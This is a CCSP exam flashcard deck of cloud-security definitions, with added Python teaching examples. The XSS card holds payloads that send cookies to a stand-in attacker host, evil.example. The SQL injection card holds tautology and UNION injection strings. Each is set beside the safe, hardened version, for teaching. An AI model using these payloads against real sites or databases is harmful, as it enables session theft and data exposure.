CCSP - All in one deck Flashcards

1
Q

Annualized loss expectancy (ALE)

A

The value derived by multiplying the single loss expectancy (SLE) by the annualized rate of occurrence (ARO); it expresses the expected yearly monetary loss from a given risk.

ALE = SLE × ARO

2
Q

Annualized rate of occurrence

A

An estimate of the number of times a given threat will successfully exploit a given vulnerability over the course of a single year. An event expected once every ten years has an ARO of 0.1.

3
Q

business continuity management

A

A process designed to identify the risks, threats, and vulnerabilities that could disrupt or impact services, with the intent of determining mitigation strategies and response processes should they occur.

4
Q

business impact analysis (BIA)

A

A structured methodology to identify and evaluate the possible risks and threats by which operations or services could be impacted, and the consequences of that impact.

5
Q

cloud application

A

An application that is accessed over the network from a cloud environment rather than being installed on a local server or desktop.

6
Q

Cloud Application Management for Platforms (CAMP)

A

Within a PaaS implementation, CAMP (an OASIS standard) serves as the framework and specification for managing services; the model for describing and documenting the components that comprise the platform; and the language for describing the overall platform, its components and services, and metadata about them.

7
Q

cloud backup

A

The process of using a cloud-based backup system, with files and data being sent over the network to a public or private cloud provider for backup.

8
Q

cloud back-up service provider

A

A public or private cloud services organization that offers backup services to the public or to organizational clients, either free of charge or under various pricing models based on data volume or number of systems.

9
Q

cloud back-up solutions

A

Services that run within a public or private cloud and offer backup solutions, either through client-based software that performs automatic or scheduled backups or through manual backups initiated from a user system.

10
Q

cloud computing

A

A model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction (NIST SP 800-145).

11
Q

Cloud computing reseller

A

An organization that sells cloud services, and possibly cloud support services, to other organizations and acts as an intermediary between the cloud customer and the cloud provider.

12
Q

Cloud Controls Matrix

A

A formally published control framework from the Cloud Security Alliance that enables cloud customers to evaluate a prospective cloud provider's security posture. The CCM also allows cloud providers to structure their own security approach.

13
Q

Cloud data portability

A

The ability to move data from one cloud provider to another, or back to the customer's own environment, without loss or re-entry of the data.

14
Q

Cloud database

A

A database that is installed in a cloud environment and accessed over the network or Internet by a user or application. Because the database runs in a cloud environment, elasticity, scalability, and high availability can be achieved and maximized.

15
Q

cloud enablement

A

The creation of a public cloud environment through the offering of services or infrastructure.

16
Q

cloud management

A

The oversight and operational management of a cloud environment by the cloud service provider, whether it is a public or private cloud.

17
Q

cloud migration

A

The process of moving services, systems, applications, or data from a traditional data center hosting model into a cloud environment.

18
Q

Cloud OS

A

An operating system used within a PaaS implementation; the term signifies that the OS is deployed and managed within a cloud environment rather than on dedicated hardware.

19
Q

Cloud provider

A

A service provider that makes storage or software applications available to customers via the Internet or private networks.

20
Q

Cloud provisioning

A

The process of allocating cloud resources from the cloud provider to the cloud customer based on the customer's specific requests and requirements, such as the number of virtual machines and the computing resources assigned to each.

21
Q

Cloud Security Alliance

A

The most prominent and well-known organization dedicated to raising awareness of best practices for security within cloud environments.

22
Q

Cloud server hosting

A

The hosting of servers within a virtualized cloud environment, rather than the virtual or physical hosting done in a traditional data center.

23
Q

Cloud service broker

A

A partner that serves as an intermediary between a cloud service customer and one or more cloud service providers.

24
Q

Cloud testing

A

The testing of systems, services, or applications by leveraging cloud platforms and resources to simulate the size and scale of real-world traffic and users.

25
Q

Common Criteria

A

A set of international security standards, codified as ISO/IEC 15408, for evaluating the security functionality and assurance of IT products; a product is evaluated against a Protection Profile or Security Target at a stated Evaluation Assurance Level (EAL).

26
Q

Community Cloud

A

A cloud infrastructure provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns. It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of these, and it may exist on or off premises.

27
Q

Container

A

A software package that contains all the code, configuration, and libraries needed for an application to run, bundled inside a single unit that shares the host operating system's kernel rather than carrying its own.

28
Q

Cross-site scripting (XSS)

A

A security vulnerability found in web applications where an attacker can inject client-side scripts into web pages that are then viewed, and executed in the browsers of, other users. From the attacker's perspective, the goal of XSS is to run script within the victim's origin and so bypass the access controls the browser's same-origin policy would otherwise enforce (for example, to steal session cookies or perform actions as the user).

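The difference between splicing untrusted input straight into HTML and encoding it for its output context, shown as an added Python example that is not part of the original deck. The attacker strings, the page template and the helper names are constructed for illustration; `html.escape` and `urllib.parse` are Python standard-library functions. The link helper goes one step beyond the card: in an attribute context, entity encoding alone does not stop a `javascript:` URL, so the scheme has to be allow-listed as well.

```python
import html
from urllib.parse import urlparse

# Constructed attacker-controlled inputs, as they might arrive from a profile form.
ATTACKER_NAME = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTACKER_LINK = 'javascript:fetch("https://evil.example/?c="+document.cookie)'


def render_unsafe(display_name: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into the HTML body,
    so the <script> element is parsed and executed in every viewer's browser."""
    return f"<p>Welcome back, {display_name}!</p>"


def render_safe(display_name: str) -> str:
    """Hardened for the HTML text-node context: '<', '>', '&' and quotes become
    entities, so the browser renders the payload as literal text."""
    return f"<p>Welcome back, {html.escape(display_name, quote=True)}!</p>"


def render_link_safe(url: str, label: str) -> str:
    """Attribute context needs more than entity encoding: a javascript: URL
    survives html.escape untouched, so the URL scheme is allow-listed first."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"  # refuse to emit a dangerous or unknown scheme
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label, quote=True)}</a>'


def contains_script(rendered: str) -> bool:
    """Crude indicator for the demonstration only: is a live <script> start tag
    or a javascript: URL still present in the emitted markup?"""
    lowered = rendered.lower()
    return "<script" in lowered or "javascript:" in lowered
```

Run `render_unsafe(ATTACKER_NAME)` and `render_safe(ATTACKER_NAME)` side by side: the first emits a live script element, the second emits `&lt;script&gt;...` that the browser displays as text.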
29
Q

Data at rest (DAR)

A

Data that resides in persistent storage on a system (disks, backups, object storage) rather than in memory or on the network.

30
Q

Data dispersion

A

A cloud storage approach where data is spread across data centers or wide geographic areas for redundancy and performance. The degree of dispersion is typically based on the needs of the application and the level of service procured by the cloud customer.

31
Q

data in transit

A

Data that flows over a network connection, either through public, unsecured networks or internal, protected corporate networks.

32
Q

data in use

A

Data within a system or application that is currently being processed, either by the application or held in memory.

33
Q

direct identifiers

A

Information that specifically identifies a unique individual on its own (name, address, email address, etc.), as distinct from indirect identifiers that only do so in combination.

34
Q

Distributed resource scheduler

A

A VMware utility that balances computing demands against available resources within a virtualized cluster.

35
Q

Dynamic application security testing (DAST)

A

Testing of an application while it is in an operational (running) state, exercising the live application together with its supporting systems and networks from the outside, typically without access to the source code.

36
Q

dynamic optimization

A

The process of moving and reallocating virtual machines and resources within a cluster environment to maintain optimal performance with balanced and distributed resource utilization.

37
Q

Eucalyptus

A

Free and open source software for building private and hybrid clouds that are compatible with the AWS APIs. The name is an acronym: Elastic Utility Computing Architecture for Linking Your Programs To Useful Systems.

38
Q

Federal Rules of civil procedures

A

A set of rules and procedures that govern civil legal proceedings in the US federal courts, providing uniformity and efficiency in resolving legal matters and proceedings; relevant to cloud because they cover discovery of electronically stored information.

39
Q

Federal rules of evidence

A

A set of rules that govern the admissibility of evidence in US federal courts, requiring that evidence be collected and presented in a uniform and official manner.

40
Q

FIPS 140-2

A

A security standard published by the US federal government (NIST) that specifies the requirements for validation of cryptographic modules; it has since been superseded by FIPS 140-3.

41
Q

Hashing

A

Taking data of arbitrary type, length, or size and using a mathematical function to map it to a value of fixed size. Hashing can be applied to virtually any type of data object; a cryptographic hash is additionally one-way and collision-resistant, which is what makes it usable for integrity verification.
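The fixed-size and integrity properties of the definition, as an added Python example (not from the deck) using the standard-library `hashlib` and `hmac` modules. The sample inputs are constructed; the SHA-256 value of `b"abc"` is the published test vector.

```python
import hashlib
import hmac


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Map input of any length to a fixed-size digest (SHA-256: 32 bytes, 64 hex chars)."""
    return hashlib.new(algorithm, data).hexdigest()


def digest_length_is_fixed(inputs, algorithm: str = "sha256") -> bool:
    """True when every input, whatever its size, produces a digest of the same length."""
    lengths = {len(digest_hex(d, algorithm)) for d in inputs}
    return len(lengths) == 1


def verify_integrity(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Integrity check as used for downloads and stored objects. compare_digest
    runs in constant time, so the comparison itself leaks nothing about where
    the digests first differ."""
    return hmac.compare_digest(digest_hex(data, algorithm), expected_hex)


def changed_bits(a_hex: str, b_hex: str) -> int:
    """Hamming distance between two digests: a one-character change in the
    input flips roughly half of the output bits (the avalanche effect)."""
    return bin(int(a_hex, 16) ^ int(b_hex, 16)).count("1")


# Constructed inputs of very different sizes, from empty to one megabyte.
SAMPLES = [b"", b"a", b"The quick brown fox", bytes(range(256)) * 4096]
```

Note that a plain hash proves integrity only when the expected digest comes from a trusted channel; anyone who can tamper with the data can recompute the hash, which is why signed or keyed (HMAC) digests are used when the digest travels with the data.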

42
Q

Host Intrusion Detection System (HIDS)

A

A host-based intrusion detection system that monitors the internal resources of a single system (files, processes, logs) for malicious activity.

43
Q

Hypervisor

A

A virtual machine manager that allows multiple virtual hosts to reside on the same physical host. A Type 1 hypervisor runs directly on the hardware; a Type 2 hypervisor runs on top of a host operating system.

44
Q

Identity Provider (IdP)

A

A system responsible for authenticating a user or system and providing assurance to a service (the relying party) that the identity is valid and known, possibly also supplying additional attributes about that identity to the service provider requesting them.

45
Q

IDS

A

A device, appliance, or software that monitors servers, systems, or networks for malicious activity and raises alerts; unlike an IPS, it does not itself block the traffic.

46
Q

Information rights management (IRM)

A

A subset of digital rights management (DRM) focused on protecting sensitive information, such as documents and email, from unauthorized exposure or use by controlling who may open, copy, print, or forward it.

47
Q

Intrusion prevention system

A

A network-based appliance or software that examines network traffic for known exploits, or attempts to use them, and actively blocks or stops them inline.

48
Q

Mean time between failures

A

A measure of the average time between failures of a hardware component, used to determine its reliability.

49
Q

measured service

A

Cloud services that are delivered and billed in a metered, pay-per-use way, with resource usage monitored, controlled, and reported.

50
Q

mobile cloud storage

A

Cloud-based storage that enables users to access their data from any network location and across multiple devices.

51
Q

mobile device management (MDM)

A

A term for the suite of policies, technologies, and infrastructure that enables an organization to manage and secure the mobile devices that are granted access to its data, across a heterogeneous mix of devices and platforms.

MDM software is typically installed on the mobile devices themselves, allowing security configurations and policies to be enforced.

52
Q

multitenancy

A

Having multiple customers and applications running within the same environment, isolated from and not visible to each other, while still sharing the same underlying resources.

53
Q

network security group

A

A set of rules that can be applied to network resources to control how network traffic is processed and handled.

Rules filter traffic based on the direction of flow, source address, destination address, source and destination ports, and the protocol being used; each matching rule either allows or denies the traffic, and rules are evaluated in priority order.
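How such a rule set is evaluated against a single flow, as an added Python example that is not part of the deck. The rules, the five-tuple fields, and the priority-ordered, first-match, default-deny semantics are constructed to mirror what the card describes, not any one cloud provider's implementation; the field names are assumptions.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    priority: int      # lower number is evaluated first
    direction: str     # "inbound" or "outbound"
    src: str           # CIDR or "*"
    dst: str           # CIDR or "*"
    dst_ports: str     # "*", "22", "80,443" or "1024-65535"
    protocol: str      # "tcp", "udp" or "*"
    action: str        # "allow" or "deny"


def _addr_match(cidr: str, ip: str) -> bool:
    return cidr == "*" or ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)


def _port_match(spec: str, port: int) -> bool:
    if spec == "*":
        return True
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False


def evaluate(rules, direction: str, src_ip: str, dst_ip: str, dst_port: int, protocol: str) -> str:
    """The first matching rule in priority order decides. A flow that matches
    nothing is denied: the implicit default deny is the property to verify
    when reviewing a rule set."""
    for rule in sorted(rules, key=lambda r: r.priority):
        if rule.direction != direction:
            continue
        if rule.protocol not in ("*", protocol):
            continue
        if not (_addr_match(rule.src, src_ip) and _addr_match(rule.dst, dst_ip)):
            continue
        if not _port_match(rule.dst_ports, dst_port):
            continue
        return rule.action
    return "deny"


# Constructed rule set: SSH only from the corporate range, HTTPS from anywhere,
# and an explicit catch-all deny so the intent is visible in the rule list.
RULES = [
    Rule(100, "inbound", "10.0.0.0/8", "*", "22", "tcp", "allow"),
    Rule(200, "inbound", "*", "*", "443", "tcp", "allow"),
    Rule(300, "inbound", "*", "*", "1024-65535", "udp", "deny"),
    Rule(65000, "inbound", "*", "*", "*", "*", "deny"),
]
```

Evaluating `evaluate(RULES, "inbound", "203.0.113.7", "10.0.5.5", 22, "tcp")` returns `"deny"` because the only SSH rule is scoped to 10.0.0.0/8 and the catch-all then applies; the same flow from 10.1.2.3 is allowed.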

54
Q

Network intrusion detection system

A

A network-based device placed at strategic points on a network to monitor and analyze all traffic traversing the subnet, comparing it against signatures for known vulnerabilities and attacks.

55
Q

NIST 800-53

A

NIST Special Publication 800-53, Security and Privacy Controls for Information Systems and Organizations: the catalog of security and privacy controls required for systems operated by or on behalf of the US federal government.

56
Q

nonrepudiation

A

The ability to prove the origin or authenticity of data to a high degree of certainty, so that the sender cannot later deny having produced it; typically achieved with digital signatures.

57
Q

object storage

A

A storage method used with IaaS where data elements are managed as objects (each carrying its data, metadata, and a unique identifier) rather than in hierarchical storage with a file system and directory structure.

58
Q

Open Group Architecture Framework

A

The Open Group Architecture Framework (TOGAF): an open enterprise architecture model intended as a high-level approach that design teams can use to optimize success, efficiency, and returns throughout a system life cycle.

59
Q

Operational level agreement (OLA)

A

An official ITIL term for a specialized service level agreement (SLA) between internal parties of an organization, supporting the SLA that the organization gives its customers.

60
Q

Privacy level agreement

A

A declaration published by a cloud service provider documenting its approach to data privacy and the protection of personal data. The PLA is implemented by the cloud service provider.

61
Q

Recovery point objective (RPO)

A

The point in time, measured backward from an interruption, to which an organization is willing to revert when restoring lost data or services; it therefore sets the maximum acceptable data loss and drives backup frequency.

62
Q

recovery time objective (RTO)

A

The defined maximum duration for which an organization can accept the loss of data or services following an interruption; it sets how quickly recovery must be completed.

63
Q

relying party

A

A system or application that provides access to secure data by relying on an identity provider to authenticate the user, rather than authenticating the user itself.

64
Q

Representational State Transfer (REST)

A

An architectural style for designing and implementing network applications using a stateless, cacheable, client-server model over HTTP, in which resources are addressed by URI and manipulated with the standard HTTP methods.

65
Q

Resource pooling

A

The aggregation of the cloud provider's resources (compute, storage, network) into shared pools from which they are dynamically allocated to serve multiple cloud customers.

66
Q

Reversibility

A

The ability of a cloud customer to recover all data and applications from a cloud provider and completely remove all data from the cloud provider's environment.

67
Q

Runtime application self-protection (RASP)

A

A security technology integrated into an application or its runtime that enables the application to detect and prevent attacks against itself in real time.

68
Q

Sandboxing

A

The segregation and isolation of information or processes from others within the same system or application, typically for security reasons, so that a compromise of one cannot affect the others.

69
Q

Sherwood applied business security architecture (SABSA)

A

A proven methodology for developing business-driven, risk- and opportunity-focused security architectures at both enterprise and solution levels that traceably support business objectives.

Widely used for information assurance architectures and risk management frameworks, as well as to align and seamlessly integrate security and risk management into IT architecture methods and frameworks. SABSA is composed of a series of integrated frameworks, models, methods, and processes that can be used independently or as a holistic, integrated enterprise solution.

70
Q

Simple object access protocol (SOAP)

A

A messaging protocol, independent of operating system, used to communicate with other systems by exchanging XML-formatted messages, typically over HTTP.

71
Q

Single Loss Expectancy (SLE)

A

The monetary value assigned to a single occurrence of a risk or exploit against an IT service, application, or system; it is the asset value multiplied by the exposure factor.

72
Q

Service Oriented Architecture (SOA)

A

An approach to providing IT applications and data services to other components through communication protocols over a network, independent of any particular technology, system, vendor, or implementation.

73
Q

Software Defined Networking (SDN)

A

An approach that separates the network's control plane from its data plane. This abstraction allows network administrators to configure and control the aspects of the network that matter to modern systems and applications without having to deal with the actual mechanisms for forwarding network traffic.

74
Q

SQL injection

A

A method used by malicious actors to insert SQL statements into a data-driven application through its input fields, attempting to get the application to execute arbitrary SQL and return the results to the attacker.

This could include attempts to read an entire database or protected data within it, or to modify or delete data.
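The attack and the fix side by side, as an added Python example that is not from the deck. The schema, the rows and the two attacker inputs are constructed for illustration; the database is Python's standard-library `sqlite3` in memory, so the example runs offline. The second payload goes a step further than the card's description and shows data being read from a table the query never referenced.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT, api_key TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, role, api_key) VALUES (?, ?, ?)",
        [("alice", "admin", "ak-alice-0001"), ("bob", "user", "ak-bob-0002")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the input is spliced into the SQL text, so quote characters
    in it change the query's structure instead of being treated as data."""
    sql = "SELECT username, role, api_key FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the placeholder is bound by the driver, so the same input is
    compared as one literal string and matches nothing."""
    return conn.execute(
        "SELECT username, role, api_key FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs: the first turns the filter into a tautology and
# dumps every row; the second appends a UNION to read the schema catalogue.
PAYLOAD_TAUTOLOGY = "x' OR '1'='1"
PAYLOAD_UNION = "x' UNION SELECT name, sql, type FROM sqlite_master --"
```

With the vulnerable lookup, `PAYLOAD_TAUTOLOGY` returns both users' API keys and `PAYLOAD_UNION` returns the `CREATE TABLE` statement from `sqlite_master`; the parameterized lookup returns an empty result for both, because no username is literally equal to the payload text.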

75
Q

static application security testing (SAST)

A

Security testing of applications by analysis of their source code, binaries, and configurations. It is performed against the application in a non-running state, typically by testers with in-depth knowledge of the systems and applications.

76
Q

Tokenization

A

The process of replacing sensitive data in a data set with an abstract or opaque substitute value (a token) that has no exploitable meaning outside the application; the mapping back to the original value is held in a separately secured token vault.
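A minimal token vault, as an added Python example that is not part of the deck. The vault class, the record layout and the account number are constructed for illustration; the point it demonstrates is that the token is random rather than derived from the value, so nothing outside the vault can reverse it, while the application can still work with the tokenized record.

```python
import secrets


class TokenVault:
    """Constructed in-memory vault for illustration. In a real deployment the
    vault is a separately secured service; the application stores only tokens
    and calls the vault only when it genuinely needs the original value."""

    def __init__(self) -> None:
        self._token_to_value: dict = {}
        self._value_to_token: dict = {}

    def tokenize(self, value: str) -> str:
        # Same input yields the same token, so the application can still
        # join, search and de-duplicate on the tokenized column.
        if value in self._value_to_token:
            return self._value_to_token[value]
        while True:
            # Random, not derived from the value: there is no key or hash
            # an attacker could use to invert the token.
            token = "tok_" + secrets.token_hex(16)
            if token not in self._token_to_value:
                break
        self._token_to_value[token] = value
        self._value_to_token[value] = token
        return token

    def detokenize(self, token: str):
        """Return the original value, or None for a token this vault never issued."""
        return self._token_to_value.get(token)


def tokenize_record(vault: TokenVault, record: dict, sensitive_fields) -> dict:
    """Replace only the sensitive fields of a record; everything else is kept
    so the downstream application remains usable."""
    return {k: (vault.tokenize(v) if k in sensitive_fields else v) for k, v in record.items()}


# Constructed sample record; the account number is made up.
SAMPLE = {"customer": "alice", "account_number": "4000123412341234", "plan": "gold"}
```

Contrast this with hashing: a hashed account number can still be brute-forced from its small input space, whereas a random token carries no information about the value at all. The cost is that the vault becomes the crown jewel and must be protected accordingly.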

77
Q

Trust zones

A

A security concept of separating systems and data into different levels or zones and applying security methods and practices to each zone based on the requirements of that particular group of systems.

78
Q

underpinning contract (UC)

A

An ITIL term for a contract negotiated and agreed upon between an organization and an external service provider or vendor, supporting the organization's SLA with its own customers.

79
Q

vertical cloud computing

A

The optimization of cloud computing resources for a particular stack or vertical, such as a specific type of application or system, or for the needs of a particular industry or sector.

80
Q

virtual host or virtual machine

A

A computing environment implemented in software and running on a host system, as opposed to a physical hardware environment.

81
Q

VM based rootkit (VMBR)

A

A type of rootkit that is installed in a virtualized environment between the underlying host system and the virtual machine; it is then executed and used when the virtual machine is started. A VM-based rootkit is very difficult to detect from within the guest, but also very difficult to implement successfully.

82
Q

Volume storage

A

A more typical or standard form of block storage used with IaaS that provides a virtual partition or hard disk to a virtual machine, which can be formatted with a file system and used as a traditional drive would be.

83
Q

web application firewall (WAF)

A

An appliance or software plugin that parses and filters HTTP traffic from a browser or client and applies a set of rules before the traffic is allowed to proceed to the actual application server.

84
Q

XML appliance

A

An appliance implemented within a network to secure and manage XML traffic. It is particularly used within a cloud environment to help integrate cloud-based systems with those still residing in traditional data centers.

85
Q

XML external entity (XXE)

A

A vulnerability in XML processing that occurs when an application's XML parser resolves external entity references contained in untrusted XML input. An attacker who controls the input can declare an entity that points at a local file or internal URL and have the parser read it, disclosing application-side data such as configuration files, the directory structure of the application, information about the hosting system, or any other data about the workings of the application that should not be exposed to users or the network. The defence is to disable DTD and external entity processing in the parser.